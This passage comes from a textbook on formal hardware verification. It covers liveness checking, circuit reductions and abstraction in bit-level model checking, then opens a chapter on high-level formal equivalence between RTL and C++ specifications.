every trace, starting from any state of the trace, the signal p must eventually occur.
The counter-based translation in Schuppan and Biere (2004) is based on attempting
to prove a stronger property Pk = GF k p for some value of k. The property Pk states
that for every trace, starting from any state of the trace, the signal p must hold within
k steps (or, equivalently, ¬p cannot occur for k steps in a row). Each such property
Pk is a safety property that can be solved by any safety model checker. Encoding Pk
only requires k additional state elements (i.e., does not require doubling the number
of state elements as in L2S). Given k, the proof of Pk yields the proof of the original
property, but a counterexample to Pk may not represent a counterexample to the
original property. Similarly to bounded model checking, a practical implementation
of this idea is to start with the value of k being 0 and to increase the value of k
by 1 each time that Pk is shown to be false. The technique was further improved
in Claessen and Sörensson (2012) as discussed next.
kLiveness
For describing this and the following algorithms, it will now be more convenient
to consider liveness properties of the form F Gq. Recall that such a property asserts
that on every trace the signal q must eventually hold forever, while an infinite-length
counterexample to F Gq is an execution for which ¬q occurs infinitely many times.
The KLIVENESS algorithm from Claessen and Sörensson (2012) counts the
maximal number of times that ¬q can occur. Effectively, this technique checks a
sequence of safety properties qk which evaluate to false when q evaluates to false
at least k + 1 times. Initially q0 = q, and qk+1 is obtained from qk by adding
“absorbing logic” that masks one occurrence of ¬q. If for some value of k, the safety
property qk is proven valid, then on every (infinite) path the signal q can occur at
34 Bit-Level Model Checking 1233
most k times, and thus the liveness property F Gq is valid. Figure 11 illustrates the
approach when k = 2.
A finite-length counterexample to qk for some k does not guarantee the existence
of a counterexample to the original liveness property or counterexamples for higher
values of k. Though, if a finite-length counterexample happens to exhibit a state
repetition within which q evaluates to false, then it is a valid counterexample to the
original liveness property. Since the state space is finite, for suitably large k, either
qk will be proven or will yield a valid unbounded counterexample. KLIVENESS is
thus sound and complete. As noted in Aleksandrowicz et al. (2013), in practice
unbounded counterexamples can often be detected even for small values of k. Given
the close relation between models being checked for increasing k, an incremental
model checker such as IC3 offers the advantage of reusing information such as
bounded and absolute invariants between each query.
Example 7. Consider the finite-state machine presented in Fig. 12. The path 000 →
001 is a path from an initial state on which ¬q occurs once; hence, the safety
Fig. 11 A safety query produced by KLIVENESS for k = 2. If there is no execution for which ¬q
occurs three times, then F Gq holds
Fig. 12 A finite-state
machine with 8 states. The
signal q is true in states 000,
010, 011, 100, and 101 and
false in states 001, 110, and
111
1234 A. Ivrii and Y. Vizel
FAIR
Example 8. Consider again the finite-state machine in Fig. 12. FAIR may discover
that the states 110 and 111 cannot be reached from an initial state; this information
represents a “reachability assertions.” Additionally, FAIR may discover that the state
001 does not have a loop back to itself and thus may conclude that 001 cannot be on
Fig. 13 Given a state s, FAIR creates two safety queries: one query checks whether there is a path
from I nit to s, and one query checks whether there is a path from s back to itself
34 Bit-Level Model Checking 1235
the loop suffix of any potential counterexample; this type of information represents
a “wall.” As all of the ¬q-states are now eliminated, FAIR will conclude that F Gq
holds.
Combining KLIVENESS and FAIR The two algorithms KLIVENESS and FAIR
have different strengths. When F Gq is valid, KLIVENESS works well when a small
value of k is sufficient to prove unsatisfiability; otherwise, the underlying safety
queries become unscalable as k becomes large. FAIR works well when inductive
proofs restrict large portions of the search space; otherwise, too many iterations are
required. The work Ivrii et al. (2018) shows how one may combine the strengths of
both approaches.
Summary
Modern model checkers use a very diverse set of algorithms for solving liveness
properties. These include BDD-based approaches, converting liveness properties to
safety properties, constructing stronger bounded liveness properties, and exploring
the structure of how different states in the design may reach each other. There is no
best method overall, and a common practice is run a portfolio of different algorithms
in parallel.
Reductions
This section gives a brief glimpse into the wealth of available reduction techniques.
Most model checkers internally represent the problem as a sequential circuit, with
the And-Inverter Graph format (Kuehlmann et al. 2002) being especially popular.
A circuit in this format contains only constants, primary inputs, two-input AND-
gates, inverters, and registers. Thus, the reduction techniques explicitly aim to
simplify this circuit, by minimizing the number of registers, inputs, and AND-
gates while guaranteeing that the simplified problem is equisatisfiable to the original
one. Reducing the number of registers is especially important, as this automatically
reduces the search space which the algorithms like PDR need to explore.
Retiming
Retiming attempts to reduce the number of registers by relocating them across com-
binational gates (Hurst et al. 2007; Kuehlmann and Baumgartner 2001; Baumgartner
and Kuehlmann 2001), in such a way that the number of registers does not change
on each path from a primary input to a primary output and on each loop.
candidates, for example, using symbolic simulation, and then on using induction to
prove these redundancies. Already proven redundancies can be exploited to prove
additional redundancies.
Input Reparameterization
Range-preserving parametric-reencoding procedures replace logic cones adjacent
to input variables with behaviorally equivalent logic cones with fewer input
variables (Baumgartner 2002; Moon et al. 2002; Eén and Mishchenko 2013). One
specific approach (Baumgartner 2002) is based on identifying a min-cut between
the inputs and the sequential elements and targets and replacing that cut with a
simpler resynthesized logic cone which comprises at most as many input variables
as the cut width. A faster but lossier approach (Eén and Mishchenko 2013) checks
if some inputs can be set to constant values while preserving the behavior of the
combinational part of the circuit. This transformation often reduces the gate count
as well.
Phase Abstraction
Phase abstraction performs a structural state folding and clocking abstraction used
to eliminate the verification overhead of “clocked” designs, where each clock
period comprises multiple verification time steps modeled using an oscillating
clock (Baumgartner 2002; Bjesse and Kukula 2005). At a high level, the algorithm
searches for oscillating clock-like logic in the circuit and eliminates this logic by
unfolding next-state functions of the sequential elements modulo their periodicity.
When applicable, this often eliminates many registers and often greatly enhances
the potential of other reduction techniques.
Over-approximations
Abstraction (Clarke et al. 1992) is a widely used method to mitigate the state
explosion problem. It aims to reduce the state space by removing details about
the system that seem irrelevant to the checked property, that is, do not seem to
be necessary either for verification or for refutation. Abstraction is best suited for
proving properties. For valid properties, in practice up to 90% of design’s state
elements can be safely removed (preserving validity of the result), making the
abstraction substantially more powerful than the reduction techniques considered
previously. However, abstraction is ultimately an over-approximation technique that
introduces additional behaviors not present in the original design. Determining
which details about the system can be ignored without introducing erroneous (also
called spurious) behaviors is not an easy task.
The most common abstraction techniques described below are based on the
intuition that for a suitable bound k, the logic sufficient to prove the property for
the first k steps of the design is also sufficient for an unbounded proof.
1238 A. Ivrii and Y. Vizel
Proof-Based Abstraction
Proof-Based Abstraction (PBA) (McMillan and Amla 2003) is a top-down approach
that considers the concrete transition system M and constructs an abstract model
after verifying that no counterexample exists up to a specific length. The approach
uses the ability of SAT solvers to compute an unsatisfiable core of an unsatisfiable
formula, that is, a subset of the formula’s clauses sufficient for unsatisfiability (Gold-
berg and Novikov 2003; Eén et al. 2010).
PBA is based on the BMC loop (see section “Bounded Model Checking”). At
each iteration, the formula ϕ k (Formula 2) is checked using a SAT solver. If ϕ k
is satisfiable, then a counterexample is found. Otherwise, ϕ k is unsatisfiable, and
an unsatisfiable core U C(ϕ k ) is extracted. Let us define the set Va = {v | v i ∈
Vars(U C(ϕ k )), 0 ≤ i ≤ k} as the set of variables from the transition system that
appears in any of the unsatisfiable cores computed so far. Clearly, Va ⊆ V . The
abstract transition system Ma is derived from M by making all variables v ∈ V \Va
nondeterministic (i.e., leaving them unconstrained). This abstraction, in the above
context, is usually referred to as a “visible variables” abstraction (Kurshan 1994).
This abstract model can now be passed to a complete model checking algorithm for
verification. If the property is proved on the abstract model Ma , then the property
also holds on the original model M, and the algorithm terminates. However, a
counterexample in Ma may not exist in M (due to the abstraction). In the case of a
spurious counterexample, the validity of the property remains unknown, and PBA
executes the next iteration of the BMC loop with a larger k.
Counterexample-Guided Abstraction
Counterexample-guided abstraction refinement (CEGAR) (Clarke et al. 2000, 2003)
is a bottom-up approach. CEGAR starts with a coarse abstract model Ma and
passes it to a model checking algorithm of choice. If a spurious counterexample
is found, Ma is refined. Refinement makes sure the spurious counterexample is
removed from Ma . Note that unlike PBA, CEGAR-based approaches do not remove
all counterexamples of a given length. This process continues until either a real
counterexample is found or Ma is proved to be safe with respect to the checked
property.
There are many variants of this framework. For example, CEGAR can be used
in conjunction with BMC in a similar manner to how PBA works. In this case,
CEGAR starts with a coarse abstract model Ma and the unfolding depth k = 1.
During the BMC stage, it looks for length-k counterexamples and uses spurious
counterexamples to refine Ma . When there are no counterexamples at a given
unfolding depth k, the unfolding depth is increased. The approach continues until
either a real counterexample is found or the abstracted model Ma is deemed
sufficiently adequate for proof analysis. In the latter case, Ma is passed to a complete
model checking algorithm for verification. As before, if Ma is safe with respect
to the checked property, then so is M and the algorithm terminates, while in the
case of a spurious counterexample the algorithm continues with a larger unfolding
depth.
34 Bit-Level Model Checking 1239
Other Approaches
It is possible to combine PBA and CEGAR into a single hybrid approach (Eén et al.
2010; Mishchenko et al. 2013). First, as per CEGAR, a sufficiently adequate abstract
model is constructed bottom-up, refining spurious counterexamples up to a specific
length k. Second, as per PBA, the abstraction is shrunk to the variables appearing in
an unsatisfiable core and only then passed to a complete model checking algorithm.
The advantage of this hybrid strategy is that it completely avoids performing BMC
queries on the original model and hence may apply to designs with a very large
number of variables.
In the description of PBA and CEGAR above, the abstraction was stated in terms
of state variables. As the design is usually represented as a circuit, a more refined
approach is possible, based on stating the abstraction in terms of internal gates
(see Mishchenko et al. (2013)).
Summary
Modern model checkers use many different techniques to simplify and to abstract
a design, prior to running a complete model checking algorithm. In practice, these
techniques significantly improve verification run-times and are indispensable for
large designs.
Conclusion
References
Aleksandrowicz G, Baumgartner J, Ivrii A, Nevo Z (2013) Generalized counterexamples to
liveness properties. In: Formal methods in computer-aided design, FMCAD 2013, Portland,
20–23 Oct 2013. IEEE, pp 169–180
1240 A. Ivrii and Y. Vizel
Baumgartner J (2002) Automatic structural abstraction techniques for enhanced verification. PhD
thesis, University of Texas
Baumgartner J, Kuehlmann A (2001) Min-area retiming on dynamic circuit structures. In: Ernst
R (ed) Proceedings of the 2001 IEEE/ACM international conference on computer-aided design,
ICCAD 2001, San Jose, 4–8 Nov 2001. IEEE Computer Society, pp 176–182
Baumgartner J, Mony H (2009) Scalable liveness checking via property-preserving transforma-
tions. In: Benini L, Micheli GD, Al-Hashimi BM, Müller W (eds) Design, automation and test
in Europe, DATE 2009, Nice, 20–24 Apr 2009. IEEE, pp 1680–1685
Baumgartner J, Mony H, Paruthi V, Kanzelman R, Janssen G (2006) Scalable sequential
equivalence checking across arbitrary design transformations. In: 24th international conference
on computer design (ICCD 2006), 1–4 Oct 2006, San Jose. IEEE, pp 259–266
Bayless S, Val CG, Ball T, Hoos HH, Hu AJ (2013) Efficient modular SAT solving for IC3. In:
Formal methods in computer-aided design (FMCAD). IEEE, pp 149–156
Biere A, Cimatti A, Clarke EM, Zhu Y (1999) Symbolic model checking without BDDs. In:
Tools and algorithms for the construction and analysis of systems (TACAS). LNCS, vol 1579.
Springer, pp 193–207
Bjesse P, Borälv A (2004) Dag-aware circuit compression for formal verification. In: 2004
international conference on computer-aided design, ICCAD 2004, San Jose, 7–11 Nov 2004.
IEEE Computer Society/ACM, pp 42–49
Bjesse P, Kukula JH (2005) Automatic generalized phase abstraction for formal verification. In:
2005 international conference on computer-aided design, ICCAD 2005, San Jose, 6–10 Nov
2005. IEEE Computer Society, pp 1076–1082
Bradley AR (2011) SAT-based model checking without unrolling. In: Verification, model checking
and abstract interpretation (VMCAI). LNCS, vol 6538. Springer, pp 70–87
Bradley AR, Somenzi F, Hassan Z, Zhang Y (2011) An incremental approach to model checking
progress properties. In: Bjesse P, Slobodová A (eds) International conference on formal
methods in computer-aided design, FMCAD’11, Austin, 30 Oct–02 Nov 2011. FMCAD Inc.,
pp 144–153
Brayton RK, Mishchenko A (2010) ABC: an academic industrial-strength verification tool. In:
Computer aided verification (CAV). LNCS, vol 6174. Springer, pp 24–40
Bryant RE (1986) Graph-based algorithms for Boolean function manipulation. IEEE Trans
Comput 35(8):677–691
Burch JR, Clarke EM, McMillan KL, Dill DL, Hwang LJ (1990) Symbolic model checking: 1020
states and beyond. In: Logic in computer science (LICS). IEEE, pp 428–439
Cabodi G, Nocco S, Quer S (2011) Interpolation sequences revisited. In: Design automation and
test in Europe (DATE). IEEE, pp 316–322
Cabodi G, Camurati P, Mishchenko A, Palena M, Pasini P (2017) SAT solver management
strategies in IC3: an experimental approach. Formal Methods Syst Des 50(1):39–74
Chockler H, Ivrii A, Matsliah A, Moran S, Nevo Z (2011) Incremental formal verification of
hardware. In: Formal methods in computer-aided design (FMCAD). FMCAD Inc., pp 135–143
Claessen K, Sörensson N (2012) A liveness checking algorithm that counts. In: Cabodi G, Singh S
(eds) Formal methods in computer-aided design, FMCAD 2012, Cambridge, 22–25 Oct 2012.
IEEE, pp 52–59
Clarke EM, Emerson EA, Sistla AP (1986) Automatic verification of finite-state concurrent
systems using temporal logic specifications. ACM Trans Program Lang Syst 8(2):244–263
Clarke E, Grumberg O, Long D (1992) Model checking and abstraction. In: Principles of
programming languages (POPL). ACM, pp 343–354
Clarke EM, Grumberg O, Jha S, Lu Y, Veith H (2000) Counterexample-guided abstraction
refinement. In: Computer aided verification (CAV). LNCS, vol 1855. Springer, pp 154–169
Clarke EM, Grumberg O, Peled DA (2001) Model checking, 1st edn.. MIT Press
Clarke EM, Grumberg O, Jha S, Lu Y, Veith H (2003) Counterexample-guided abstraction
refinement for symbolic model checking. J ACM 50(5):752–794
Clarke EM, Kroening D, Ouaknine J, Strichman O (2004) Completeness and complexity
of bounded model checking. In: Verification, model checking and abstract interpretation
(VMCAI). LNCS, vol 2937. Springer, pp 85–96
34 Bit-Level Model Checking 1241
Cook SA (1971) The complexity of theorem-proving procedures. In: ACM symposium on theory
of computing (STOC). ACM, pp 151–158
Craig W (1957) Linear reasoning. A new form of the Herbrand-Gentzen theorem. J Symb Logic
22(3):250–268
Eén N, Mishchenko A (2013) A fast reparameterization procedure. In: Ganai MK, Sen A (eds)
Proceedings of the second international workshop on design and implementation of formal tools
and systems, Portland, 19 Oct 2013. CEUR workshop proceedings, vol 1130. CEUR-WS.org
Eén N, Mishchenko A, Amla N (2010) A single-instance incremental SAT formulation of proof-
and counterexample-based abstraction. In: Bloem R, Sharygina N (eds) Proceedings of 10th
international conference on formal methods in computer-aided design, FMCAD 2010, Lugano,
20–23 Oct. IEEE, pp 181–188
Een N, Mishchenko A, Brayton R (2011) Efficient implementation of property directed
reachability. In: Formal methods in computer-aided design (FMCAD). FMCAD Inc,
pp 125–134
Froleyks N, Biere A (2021) Single clause assumption without activation literals to speed-up IC3.
In: Formal methods in computer aided design, FMCAD 2021, New Haven, 19–22 Oct 2021.
IEEE, pp 72–76
Goldberg E, Novikov Y (2003) Verification of proofs of unsatisfiability for CNF formulas. In:
Design automation and test in Europe (DATE). IEEE, pp 886–891
Gurfinkel A, Ivrii A (2015) Pushing to the top. In: Kaivola R, Wahl T (eds) Formal methods in
computer-aided design, FMCAD 2015, Austin, 27–30 Sept 2015. IEEE, pp 65–72
Hassan Z, Bradley AR, Somenzi F (2013) Better generalization in IC3. In: Formal methods in
computer-aided design (FMCAD). FMCAD Inc., pp 157–164
Hurst AP, Mishchenko A, Brayton RK (2007) Fast minimum-register retiming via binary
maximum-flow. In: Formal methods in computer-aided design, 7th international conference,
FMCAD 2007, Austin, 11–14 Nov 2007, Proceedings. IEEE Computer Society, pp 181–187
Ivrii A, Nevo Z, Baumgartner J (2018) k-fair = k-liveness + FAIR revisiting sat-based liveness
algorithms. In: Bjørner N, Gurfinkel A (eds) 2018 formal methods in computer aided design,
FMCAD 2018, Austin, 30 Oct–2 Nov 2018. IEEE, pp 1–5
Jhala R, McMillan KL (2005) Interpolant-based transition relation approximation. In: Computer
aided verification (CAV), vol 3576. Springer, pp 39–51
Krishnan HGV, Vizel Y, Ganesh V, Gurfinkel A (2019) Interpolating strong induction. In: Dillig
I, Tasiran S (eds) Computer aided verification – 31st international conference, CAV 2019, New
York City, 15–18 July 2019, Proceedings, Part II. Lecture notes in computer science, vol 11562.
Springer, pp 367–385
Kuehlmann A, Baumgartner J (2001) Transformation-based verification using generalized
retiming. In: Berry G, Comon H, Finkel A (eds) Computer aided verification, 13th international
conference, CAV 2001, Paris, 18–22 July 2001, Proceedings. Lecture notes in computer science,
vol 2102. Springer, pp 104–117
Kuehlmann A, Paruthi V, Krohm F, Ganai MK (2002) Robust boolean reasoning for equivalence
checking and functional property verification. IEEE Trans Comput Aided Des Integr Circuits
Syst 21(12):1377–1394
Kurshan RP (1994) Computer-aided verification of coordinating processes: the automata-theoretic
approach. Princeton University Press, Princeton
Li J, Zhu S, Zhang Y, Pu G, Vardi MY (2017) Safety model checking with complementary
approximations. In: Parameswaran S (ed) 2017 IEEE/ACM international conference on
computer-aided design, ICCAD 2017, Irvine, 13–16 Nov 2017. IEEE, pp 95–100
McMillan KL (2003) Interpolation and SAT-based model checking. In: Computer aided
verification (CAV). LNCS, vol 2725. springer, pp 1–13
McMillan KL, Amla N (2003) Automatic abstraction without counterexamples. In: Tools and
algorithms for the construction and analysis of systems (TACAS). LNCS, vol 2619. Springer,
pp 2–17
Mishchenko A, Chatterjee S, Brayton RK (2006) Dag-aware AIG rewriting a fresh look at
combinational logic synthesis. In: Sentovich E (ed) Proceedings of the 43rd design automation
conference, DAC 2006, San Francisco, 24–28 July 2006. ACM, pp 532–535
1242 A. Ivrii and Y. Vizel
Mishchenko A, Eén N, Brayton RK, Baumgartner J, Mony H, Nalla PK (2013) GLA: gate-level
abstraction revisited. In: Design automation and test in Europe (DATE). EDA Consortium,
pp 1399–1404
Mony H, Baumgartner J, Paruthi V, Kanzelman R, Kuehlmann A (2004) Scalable automated
verification via expert-system guided transformations. In: Hu AJ, Martin AK (eds) Formal
methods in computer-aided design, 5th international conference, FMCAD 2004, Austin, 15–17
Nov 2004, Proceedings. Lecture notes in computer science, vol 3312. Springer, pp 159–173
Mony H, Baumgartner J, Mishchenko A, Brayton RK (2009) Speculative reduction-based scalable
redundancy identification. In: Benini L, Micheli GD, Al-Hashimi BM, Müller W (eds) Design,
automation and test in Europe, DATE 2009, Nice, 20–24 Apr 2009. IEEE, pp 1674–1679
Moon I, Kwak H, Kukula JH, Shiple TR, Pixley C (2002) Simplifying circuits for formal
verification using parametric representation. In: Aagaard MD, O’Leary JW (eds) Formal
methods in computer-aided design, 4th international conference, FMCAD 2002, Portland,
6–8 Nov 2002, Proceedings. Lecture notes in computer science, vol 2517. Springer, pp 52–69
Pnueli A (1977) The temporal logic of programs. In: 18th annual symposium on foundations of
computer science, Providence, 31 Oct–1 Nov 1977. IEEE Computer Society, pp 46–57
Queille J-P, Sifakis J (1982) Specification and verification of concurrent systems in CESAR. In:
International symposium on programming, pp 337–351
Ravi K, Bloem R, Somenzi F (2000) A comparative study of symbolic algorithms for the compu-
tation of fair cycles. In: WAH. Jr. and Johnson SD (eds) Formal methods in computer-aided
design, third international conference, FMCAD 2000, Austin, 1–3 Nov 2000, Proceedings.
Lecture notes in computer science, vol 1954. Springer, pp 143–160
Rozier KY (2011) Linear temporal logic symbolic model checking. Comput Sci Rev 5(2):163–203
Schuppan V, Biere A (2004) Efficient reduction of finite state model checking to reachability
analysis. Int J Softw Tools Technol Transf 5(2–3):185–204
Sheeran M, Singh S, Stålmarck G (2000) Checking safety properties using induction and a SAT-
solver. In: Formal methods in computer-aided design (FMCAD). LNCS, vol 1954. Springer,
pp 108–125
Tseitin G (1983) On the complexity of proofs in propositional logics. In: Siekmann J, Wrightson
G (eds) Automation of reasoning: classical papers in computational logic 1967–1970, vol 2.
Springer. Originally published 1970
van Eijk CAJ (1998) Sequential equivalence checking without state space traversal. In: Dewilde
PM, Rammig FJ, Musgrave G (eds) 1998 design, automation and test in Europe (DATE’98),
23–26 Feb 1998, Le Palais des Congrès de Paris, Paris. IEEE Computer Society, pp 618–623
Vardi MY (2007) Automata-theoretic model checking revisited. In: Cook B, Podelski A (eds)
Verification, model checking, and abstract interpretation, 8th international conference, VMCAI
2007, Nice, 14–16 Jan 2007, Proceedings. Lecture notes in computer science, vol 4349.
Springer, pp 137–150
Vizel Y, Grumberg O (2009) Interpolation-sequence based model checking. In: Formal methods
in computer-aided design (FMCAD). IEEE, pp 1–8
Vizel Y, Gurfinkel A (2014) Interpolating property directed reachability. In: Computer aided
verification (CAV). LNCS, vol 8559. Springer, pp 260–276
Vizel Y, Ryvchin V, Nadel A (2013) Efficient generation of small interpolants in CNF. In:
Computer aided verification (CAV). LNCS, vol 8044. Springer, pp 330–346
Vizel Y, Gurfinkel A, Malik S (2015) Fast interpolating BMC. In: Kroening D, Pasareanu CS
(eds) Computer aided verification – 27th international conference, CAV 2015, San Francisco,
18–24 July 2015, Proceedings, Part I. Lecture notes in computer science, vol 9206. Springer,
pp 641–657
Wolper P, Vardi MY, Sistla AP (1983) Reasoning about infinite computation paths (extended
abstract). In: 24th annual symposium on foundations of computer science, Tucson, 7–9 Nov
1983. IEEE Computer Society, pp 185–194
Wu C, Wu C, Lai C, Huang CR (2013) A counterexample-guided interpolant generation algorithm
for sat-based model checking. In: The 50th annual design automation conference 2013,
DAC’13, Austin, 29 May–07 June 2013. ACM, pp 118:1–118:6
High-Level Formal Equivalence
35
Theo Drane and M. V. Achutha Kiran Kumar
Contents
Types of Equivalence to Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1244
Combinational Equivalence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1245
Sequential Equivalence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1246
Transaction-Based Equivalence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1247
Advanced Datapath Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1259
Managing Inconclusive Proofs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1259
Accuracy Challenges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1261
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1268
Abstract
T. Drane ()
Intel Corporation, Folsom, CA, USA
e-mail: [email protected]
M. V. A. Kiran Kumar ()
DEG, Intel Corporation, Bengaluru, India
e-mail: [email protected]
Keywords
The need for FEV can be seen as a natural outgrowth of the increased level of design
abstraction as the industry has matured over the past half century. During the initial
days of chip design (before 1980), the designers used to draw the circuits by hand
and work at the transistor level. In the following decade (1981–1989), the drawing
of such circuits was improved with the aid of computer-aided design (CAD), and
circuit design became much simpler, but was not yet optimal. In these early days,
nobody thought about verifying their designs formally; the technology had not yet
reached the level where such tools were possible for practical use.
The RTL mode of designing started around the early 1990s and is still the
major mode of logic design as of this writing. With the advent of RTL, new tools
were introduced to automatically synthesize the coded design into the functional
schematic netlists. This allowed the generation of much more complex netlists than
were possible with previous methods, which necessitated good RTL-vs-netlist FEV
tools. In the twenty-first century, the C/C++/SystemC mode of coding the design
has begun to emerge, where the design is defined in the high-level language, and a
new generation of synthesis tools can convert the high-level language to RTL and
even to the netlist. Hence formal equivalence checks have become an even more
important requirement to ensure that designs are faithfully translated across the
different abstraction levels. Due to these various motivations, FEV is one of the most
mature FV techniques; it is now considered a standard requirement to ensure the
design intent is maintained as designers refine their abstractions into real designs.
In this chapter various equivalence techniques will be explored, look at their
applications in the real world, and show how this requires a different style of
interaction with the tools and with the design. The primarily context for the
discussion talks about the usages where at least one of the models is RTL. These
are also the usage modes for which the most mature industry tools are available.
As design and complexity grows, it is not unusual to encounter formal equiv-
alency proofs that yield inconclusive results. Approaches to overcoming such
challenges as well as cases of bounded equivalence are covered at the end of the
chapter.
Combinational Equivalence
Combinational equivalence is the most mature FEV technique in the EDA industry;
using this technique to compare RTL and schematic netlists is considered a
requirement at most companies doing VLSI design. This is the primary FEV
technique used for state-matching models, where every state element (latch or flop)
in the SPEC corresponds to a specific state element in the IMP. In this mode, two
designs are claimed to be equivalent when all combinational logic between any
pair of states are logically equivalent. In other words, there is a 1:1 correspondence
between the state elements of the two models. Whenever the equivalence of a pair
of state elements in the two models is checked, the tool uses the assumption that
corresponding state elements in their fanin cones will contain identical values at all
points in time. In effect, every latch or flop in the two designs is being treated as a
cut point, with verification only encompassing the logic between the state elements.
This might seem like a huge limitation – but it arose in tandem with logic
synthesis technology that has a similar structure. In other words, most EDA tools
that synthesize netlists from RTL are also state-matching, guaranteeing (mostly)
that each state element in the netlist will correspond to a state element in the RTL.
In addition, the state-matching compromise makes the FEV problem much more
tractable: FEV tools that use this method just need to analyze Boolean expressions,
with no need to account for value changes over time. Thus, combinational FEV is
the technique used in most RTL to gate logic checkers today. If state elements are
present, then not only are the outputs compared but the logic cones driving each pair
of corresponding registers is checked individually. Since the RTL and netlist state
elements directly correspond to each other, this check guarantees that the netlist is
truly an implementation of the RTL.
As depicted in Fig. 1, the key points, or significant points used by the FEV tool,
are composed of the input-output interfaces and the internal state elements. The
main points of comparison are the state elements {R1, r1} and {R2, r2} and the
outputs X and Y. As long as each of these points can be shown to have logically
equivalent combinational driving cones in both models, one can confidently say that
the models are equivalent.
One can probably think of some major limitations of this type of equivalence.
For example, what happens if the implementation needs to recode a finite state
machine (FSM), using a different set of intermediate states to ultimately generate
the same output? The application of combinational equivalence to FSMs is limited
to comparing models that have equivalent sets of state elements. If this condition is
not met, the combinational FEV tool will report the two models as non-equivalent.
Modern RTL-netlist FEV tools do have some clever optimizations for very simple
cases of non-state-matching, such as flop replication or constant propagation. But
in general, the state-preserving requirement is a stringent one, and there are many
FEV scenarios in which it must be relaxed for effective verification.
Sequential Equivalence
• State representation
• Pipeline depth
• Interface timing and protocols
• Resource scheduling and allocation
• Differences in data types
• Clock gating and other power-saving features
For example, when using sequential FEV, one of the designs under comparison
might be a pipelined version of the other. One could prove the equivalence of the
35 High-Level Formal Equivalence 1247
pure behavioral model of RTL to the complete pipelined implementation and satisfy
that they do indeed implement equivalent functionality. One common application of
this methodology is during the equivalence check of an unpipelined and pipelined
model in RTL. In the simplest case of comparison, one can assume that the same
input patterns are applied to the corresponding inputs of both the designs, and the
outputs are compared with some known delay after the RTL pipeline is completely
filled.
Transaction-Based Equivalence
This is another variant of sequential FEV. In some cases, one model will be highly
abstract compared to the other, and its outputs will generally not match cycle-by-
cycle except for certain well-defined transactions. This needs a looser notion of
equivalence, based on checking that legal transactions are handled equivalently. The
equivalence can be after a fixed number of RTL clock cycles, which could signify
the transaction, or a completely unpredictable number based on the transaction
completion. Hence, this notion is more generic and is a superset of all the
equivalence modes: models which are not combinatorial or sequentially equivalent
may still be able to demonstrate transaction-based equivalence.
Figure 2 illustrates a high-level view of a transaction-based equivalence check.
To further clarify what FEV is doing, let’s examine a conceptual view of the
“transaction space” of a typical design.
This notion of equivalence is quite general and encompasses the previous notions
of equivalence described in this section. This model of equivalence:
• Does not assume that the amount of time (or the number of state transitions)
required to complete one transaction will be the same for the RTL and the system
level design (SLM)
Transaction A
SLMA[0] SLMA[1]
Transaction A
• Denotes the end of a transaction by either a fixed number of RTL cycles or some
kind of “data ready” handshaking protocol
• Assumes the user is able to specify a set of initial states (a partial assignment of
values to the state-holding elements) for both the RTL and system level design,
which represents the model state at the start of a valid transaction
• Assumes the user is able to specify a set of states for both designs that correspond
to the end of a transaction
At the end of a transaction, the outputs of the two designs are compared, and a check
is made to ensure the ending state of both designs still satisfies the state invariants
and constraints.
Most performance optimizations would make the design retain the same func-
tionality but wouldn’t necessarily have a constant or definite relationship with the
earlier implementation. In such cases, even a sequential equivalence check might not
be a correct option to choose; the transaction-based equivalence should definitely
help.
Verification Methodology
1. SystemC/C++ front-end compilation
Specifications written in high level languages such as C/C++ and SystemC
are used to test the functionality of complex algorithms. These specifications
are exhaustively tested against standard WHQL and other standard algorithmic
references and are considered golden w.r.t architecture specifications. Ideally,
one would want to compare these golden specs directly with RTL to achieve
confidence in the RTL design once the complete data space coverage is available.
However, compiling a C++ specification in a formal tool can present a varying
range of ease from straightforward compilation to almost exposing never con-
verging data structures that pose an impossible task based on the how the design
has been written and capability of the FV tool.
The high-level code, agnostic to the formal verification requirements, tends
to have a lot of features that are not formal friendly. The coding standards
for these kinds of simulation code would aim in maximizing the efficiency
and speed, which aren’t the correct fit for the FV compatibility. Also, every
company has a set of optimized and customized libraries which are essential in
writing the golden specs. It would be challenging if the constructs used in these
libraries are not supported by formal verification tool. Some examples could be
extensive use of pointes, use of new and delete constructs (in context of dynamic
memory allocation), extensive use of STLs, string functions (mostly used in test
generation code), etc.
In most of the cases, the problem may be due to inherent style and comfort
level of the designer writing the code and it may be entirely possible to
avoid such constructs by rewriting this in a formal-friendly way. However, the
legacy code involved may have many such deep rooted constructs which would
be impossible/impractical to rectify and rewrite. Handling these complexities
35 High-Level Formal Equivalence 1249
of simulation models, this boundary does not match as the designers are mostly
focused on unit level interface matching and do not care about the algorithmic
boundary. Hence most FV tools provide a standard way of writing a wrapper over
the C++ code. This glue logic would clearly convey to the tool the inputs and
outputs which need to be treated as symbolic. Also, it clearly identifies the C++
function which is to be tested using transactional equivalence.
The specification in C will be converted to a suitable format for the tool to
process the design and start the verification activity. Some tools convert into a
form of a binary decision diagram (BDD) and some prefer to create a data flow
graph (DFG) .
3. Linting checks on C++/SystemC
Many static checks can be run on the database that can be created from the
compilation. The static checks can range from pointer checks, loop limits,
typecasting checks, to range overflow checks. There are other linting checks
also possible in C++ such as standard static assertions which flag the program
crashes, lead to undefined behavior (such as out-of-bound array accesses, max
iteration checks, division by zero checks, check whether value of second operator
in a shift is within the bit width of the first operand, and so on). There are usually
automatically checked by all tools in the compilation phase itself.
4. RTL front-end compilation
There are many Verilog/SV/VHDL front-end parsers and compilers in the market
that also translates the implementation design into a BDD/DFG.
5. Linting checks in RTL
Multiple static RTL checks like multiple driver assignment, combo loop assess-
ment, and undriven checks are possible on the implementation RTL. There are
many static checks possible beyond the basic LINT checks and depends on the
strong front-end compiler deployed.
6. C++ – RTL mapping
Creating the verification problem needs a mapping of the two designs to be ver-
ified. The mapping can mean creating points of equivalent drives across various
interfaces on the design under consideration. Many tools support mapping by
